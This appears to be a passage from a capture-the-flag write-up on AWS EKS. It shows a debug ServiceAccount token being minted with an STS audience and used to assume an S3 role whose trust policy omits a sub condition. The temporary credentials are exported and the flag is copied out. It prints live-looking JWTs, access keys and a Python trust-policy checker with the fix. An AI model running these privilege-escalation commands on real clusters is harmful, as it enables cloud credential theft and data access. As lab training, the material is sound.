eyJhbGciOiJSUzI1NiIsImtpZCI6IjBmZTg2ZjE4MjViYThmMWUyMmE0YjE3ZWQ2MjdlNjRlY2M1ZTI2ZTIifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc0NTA2MDQzNywiaWF0IjoxNzQ1MDU2ODM3LCJpc3MiOiJodHRwczovL29pZGMuZWtzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2lkL0MwNjJDMjA3QzhGNTBERTRFQzI0QTM3MkZGNjBFNTg5Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJjaGFsbGVuZ2U1Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlYnVnLXNhIiwidWlkIjoiNmNiNjAyNGEtYzRkYS00N2E5LTkwNTAtNTljOGM3MDc5OTA0In19LCJuYmYiOjE3NDUwNTY4MzcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjaGFsbGVuZ2U1OmRlYnVnLXNhIn0.o6Abm0l0aZcFnejNZK-QR2v4FA7fmWsU1Vir7_x4IL09Eo1zBp4o8gJ-djogQ4Q1tUCSWqU_auLfjDPk9c6UowHl7gKp131K5GLgW2Dqw2QhAuYPX8BvVHdC2gqU_0v8PqsbW79zvK5xvo7w4p7kMvRxOsWn9_UBnfw1tkLrf-LP7AsuX21TWYtByIlf51AGH9vLkMBlXmfK2pTj0hRwV36a4FrJmhOG5l5cRU4ONxgbx247S9OPFqDic4l49fAt8i1tGrDJ1VHT0xeoktJoy7JNfyvfJ-enkz4C8yadfhkFzKkWsh0bo4mhkORONyCAi2_boZkiX9x8qH1olBlrEg
Decoding the JWT (it is signed, not encrypted, so the claims are readable by anyone) shows iss set to the cluster's OIDC issuer, sub set to system:serviceaccount:challenge5:debug-sa and aud set to https://kubernetes.default.svc. The signature ties the token to the cluster; the issuer is what makes it meaningful to AWS.

That token cannot be used with AWS because its audience is wrong. Mint a new one with --audience sts.amazonaws.com:
root@wiz-eks-challenge:~# kubectl create token debug-sa --audience sts.amazonaws.com
eyJhbGciOiJSUzI1NiIsImtpZCI6IjBmZTg2ZjE4MjViYThmMWUyMmE0YjE3ZWQ2MjdlNjRlY2M1ZTI2ZTIifQ.eyJhdWQiOlsic3RzLmFtYXpvbmF3cy5jb20iXSwiZXhwIjoxNzQ1MDYxMzI1LCJpYXQiOjE3NDUwNTc3MjUsImlzcyI6Imh0dHBzOi8vb2lkYy5la3MudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vaWQvQzA2MkMyMDdDOEY1MERFNEVDMjRBMzcyRkY2MEU1ODkiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImNoYWxsZW5nZTUiLCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVidWctc2EiLCJ1aWQiOiI2Y2I2MDI0YS1jNGRhLTQ3YTktOTA1MC01OWM4YzcwNzk5MDQifX0sIm5iZiI6MTc0NTA1NzcyNSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmNoYWxsZW5nZTU6ZGVidWctc2EifQ.HfjddHBT-26LqmaeUMYlr63MhLwvaVie_cVQdCOeBJwozomHnXPJYw9GOrOascpXocAeD6iWLvS1iQ0wuKwdNPy04DEP2M6eTa4kfNieeS1WxvDpIj587h3lg13ggBa1TpvmDUbtXJUj-jL-Q4VSCht70eXNnQDmC--5poGY88RX9XiousImJsjBbFGEioydO64gCo0OogltJ5oMWgtt_BwwnkDSCOutKG9kraodaRVpqCy4Ed2HcoHb90u_9JfrrITcfP0Y74wpwbfbyPOXCLUdGKN7Fkrp17xM9nVLAjD2f6zuljEH2eMGW09Wm_niYs2OcEKqLNMawihFyRXVqQ
If it errors, refresh the page and try again.
Decode it again. aud is the audience, the intended recipient of the token, and it now reads sts.amazonaws.com, the AWS STS service.

With a token STS will accept, the next step is to assume the IAM role. Note that the role requested is challengeEksS3Role, the one annotated on s3access-sa, while the token belongs to debug-sa; STS accepts it anyway, which tells us the role's trust policy does not pin the sub claim to s3access-sa. That is the misconfiguration this challenge turns on.
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name sessionABC --web-identity-token eyJhbGciOiJSUzI1NiIsImtpZCI6IjBmZTg2ZjE4MjViYThmMWUyMmE0YjE3ZWQ2MjdlNjRlY2M1ZTI2ZTIifQ.eyJhdWQiOlsic3RzLmFtYXpvbmF3cy5jb20iXSwiZXhwIjoxNzQ1MDYxMzI1LCJpYXQiOjE3NDUwNTc3MjUsImlzcyI6Imh0dHBzOi8vb2lkYy5la3MudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vaWQvQzA2MkMyMDdDOEY1MERFNEVDMjRBMzcyRkY2MEU1ODkiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImNoYWxsZW5nZTUiLCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVidWctc2EiLCJ1aWQiOiI2Y2I2MDI0YS1jNGRhLTQ3YTktOTA1MC01OWM4YzcwNzk5MDQifX0sIm5iZiI6MTc0NTA1NzcyNSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmNoYWxsZW5nZTU6ZGVidWctc2EifQ.HfjddHBT-26LqmaeUMYlr63MhLwvaVie_cVQdCOeBJwozomHnXPJYw9GOrOascpXocAeD6iWLvS1iQ0wuKwdNPy04DEP2M6eTa4kfNieeS1WxvDpIj587h3lg13ggBa1TpvmDUbtXJUj-jL-Q4VSCht70eXNnQDmC--5poGY88RX9XiousImJsjBbFGEioydO64gCo0OogltJ5oMWgtt_BwwnkDSCOutKG9kraodaRVpqCy4Ed2HcoHb90u_9JfrrITcfP0Y74wpwbfbyPOXCLUdGKN7Fkrp17xM9nVLAjD2f6zuljEH2eMGW09Wm_niYs2OcEKqLNMawihFyRXVqQ
{
  "Credentials": {
    "AccessKeyId": "ASIA2AVYNEVM6PL33GGR",
    "SecretAccessKey": "o+/o8fIJn9JAf1VjxrJ9jMMC/CGdZJyskK8NKhz5",
    "SessionToken": "<elided>",
    "Expiration": "2025-04-19T11:20:24+00:00"
  },
  "SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
  "AssumedRoleUser": {
    "AssumedRoleId": "AROA2AVYNEVMZEZ2AFVYI:sessionABC",
    "Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/sessionABC"
  },
  "Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
  "Audience": "sts.amazonaws.com"
}
688655246681 is the AWS account ID; it can be read with aws sts get-caller-identity --query "Account".
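The token-audience and trust-policy logic of this challenge, as an added example (my code, not the challenge's): decode a projected ServiceAccount token's claims without verifying it (STS does the verifying, against the cluster's OIDC JWKS), then evaluate a role trust policy the way AssumeRoleWithWebIdentity does against the token's aud and sub. The tokens are constructed and unsigned. NARROW_POLICY is the trust policy challengeEksS3Role should carry; BROAD_POLICY is the audience-only kind that accepts debug-sa's token, which is what the assume-role output above demonstrates. Only the StringEquals and StringLike operators are implemented.

```python
"""Added example, not the challenge's code: decode a projected ServiceAccount
token's claims (no signature check; STS verifies against the cluster's OIDC
JWKS) and evaluate an IAM trust policy against aud and sub the way
AssumeRoleWithWebIdentity does.  Tokens and policies here are constructed."""
import base64
import fnmatch
import json

ISSUER = "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
PROVIDER_ARN = f"arn:aws:iam::688655246681:oidc-provider/{ISSUER}"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def make_unsigned_jwt(claims: dict) -> str:
    """Constructed token for testing; the signature segment is a dummy."""
    header = _b64url(json.dumps({"alg": "RS256", "kid": "example"}).encode())
    return f"{header}.{_b64url(json.dumps(claims).encode())}.dummysig"


def decode_claims(token: str) -> dict:
    """Claims only: a JWT is signed, not encrypted, so no key is needed to read it."""
    payload = token.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))


def debug_sa_token(audience: str) -> str:
    """Shape of what `kubectl create token debug-sa --audience AUD` returns."""
    return make_unsigned_jwt({
        "iss": f"https://{ISSUER}", "aud": [audience],
        "sub": "system:serviceaccount:challenge5:debug-sa",
        "kubernetes.io": {"namespace": "challenge5", "serviceaccount": {"name": "debug-sa"}},
    })


def _as_list(x):
    return x if isinstance(x, list) else [x]


def _condition_ok(op: str, expected, actual: str) -> bool:
    values = _as_list(expected)
    if op == "StringEquals":
        return actual in values
    if op == "StringLike":
        return any(fnmatch.fnmatchcase(actual, v) for v in values)
    raise ValueError(f"unsupported condition operator {op}")


def trust_policy_allows(policy: dict, token: str, provider_arn: str) -> bool:
    """True if some Allow statement for sts:AssumeRoleWithWebIdentity from this
    provider accepts the token.  Condition keys are '<issuer>:aud' / '<issuer>:sub'."""
    claims = decode_claims(token)
    issuer = claims["iss"].removeprefix("https://")
    aud = _as_list(claims["aud"])[0]
    token_values = {f"{issuer}:aud": aud, f"{issuer}:sub": claims["sub"]}
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow" or "sts:AssumeRoleWithWebIdentity" not in _as_list(st.get("Action")):
            continue
        if provider_arn not in _as_list(st.get("Principal", {}).get("Federated")):
            continue
        conditions = st.get("Condition", {})
        if all(_condition_ok(op, expected, token_values.get(key, ""))
               for op, keys in conditions.items() for key, expected in keys.items()):
            return True
    return False


def _policy(condition: dict) -> dict:
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Principal": {"Federated": PROVIDER_ARN},
        "Action": "sts:AssumeRoleWithWebIdentity", "Condition": {"StringEquals": condition}}]}


# What challengeEksS3Role should trust: one audience, one ServiceAccount.
NARROW_POLICY = _policy({f"{ISSUER}:aud": "sts.amazonaws.com",
                         f"{ISSUER}:sub": "system:serviceaccount:challenge5:s3access-sa"})
# Audience only: every ServiceAccount in the cluster can assume the role.
BROAD_POLICY = _policy({f"{ISSUER}:aud": "sts.amazonaws.com"})

if __name__ == "__main__":
    tok = debug_sa_token("sts.amazonaws.com")
    print(decode_claims(tok)["sub"], trust_policy_allows(BROAD_POLICY, tok, PROVIDER_ARN),
          trust_policy_allows(NARROW_POLICY, tok, PROVIDER_ARN))
```

Reading a real role's policy is `aws iam get-role --role-name challengeEksS3Role --query Role.AssumeRolePolicyDocument`, which the stolen credentials may or may not be allowed to call; the fix for the broad form is the sub condition shown in NARROW_POLICY, or a StringLike on `system:serviceaccount:<namespace>:*` when a whole namespace is meant to be trusted.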
Export the returned credentials:

root@wiz-eks-challenge:~# export AWS_ACCESS_KEY_ID=ASIA2AVYNEVM6PL33GGR
root@wiz-eks-challenge:~# export AWS_SECRET_ACCESS_KEY=o+/o8fIJn9JAf1VjxrJ9jMMC/CGdZJyskK8NKhz5
root@wiz-eks-challenge:~# export AWS_SESSION_TOKEN=<elided>

Then copy the flag out of the bucket:
root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag /tmp/flag
download: s3://challenge-flag-bucket-3ff1ae2/flag to ../../tmp/flag
root@wiz-eks-challenge:~# cd /tmp
root@wiz-eks-challenge:/tmp# ls
flag
root@wiz-eks-challenge:/tmp# cat flag
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}
It still feels like too much material. I was in a fog doing these; so many of the concepts were new to me.